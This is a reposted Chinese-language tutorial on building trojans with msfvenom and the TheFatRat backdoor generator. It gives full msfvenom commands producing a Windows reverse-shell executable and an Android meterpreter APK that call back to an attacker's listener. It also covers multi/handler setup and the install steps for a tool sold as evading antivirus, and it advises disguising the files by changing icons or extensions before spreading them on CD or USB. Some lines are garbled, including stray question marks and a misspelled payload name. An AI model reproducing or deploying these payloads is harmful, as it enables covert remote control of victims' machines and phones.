Msfvenom木马使用及TheFatRat工具
msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe
msfvenom? -p android/meterpreter/reverse_tcp LHOST=192.168.168.111 LPORT=3333 R>a.apk
?
打開msfconsole
use?exploit/multi/handler
set?payload?windows/meterpreter/reverset_tcp
?
-===========================================
TheFatRat:Msfvenom免殺后門生成工具
項目主頁
https://github.com/screetsec/thefatrat
本工具能使用msfvenom生成后門,程序能夠用meterpreter reverse_tcp payload編譯C語言程序,并能夠繞過殺軟。
自動化metasploit功能
檢查metasploit服務是否啟動
建造Windows, Linux, Android 和Mac的meterpreter reverse_tcp payload
開啟多個meterpreter reverse_tcp監聽
searchsploit快速搜索
免殺
進入Msfconsole
自動運行后門
目標如果沒有開啟UAC,你就可以這些文件復制到CD或USB。修改圖標或者后綴
安裝要求
linux操作系統,推薦Kali Linux 2或Kali 2016.1 rolling / Cyborg / Parrot /
Dracos / BackTrack / Backbox等
metasploit框架
gcc, i586-mingw32msvc-gcc或i686-w64-mingw32-gcc ( apt-get install
mingw32 )
開始使用
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatrat
apt-get update
apt-get install mingw32 backdoor-factory
如果提示沒有安裝MinGW或無法找到包
運行
提取lalin-master to your home or another folder
chmod +x fatrat
chmod +x powerfull.sh
./fatrat
然后根據選項輸入相應數字
使用截圖
查毒
文章出處:MottoIN
轉載于:https://www.cnblogs.com/jjj-fly/p/8146296.html
總結
以上是生活随笔為你收集整理的Msfvenom木马使用及TheFatRat工具的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 淄博联海城企业文件图纸数据信息透明加密系
- 下一篇: spring-boot+swagger实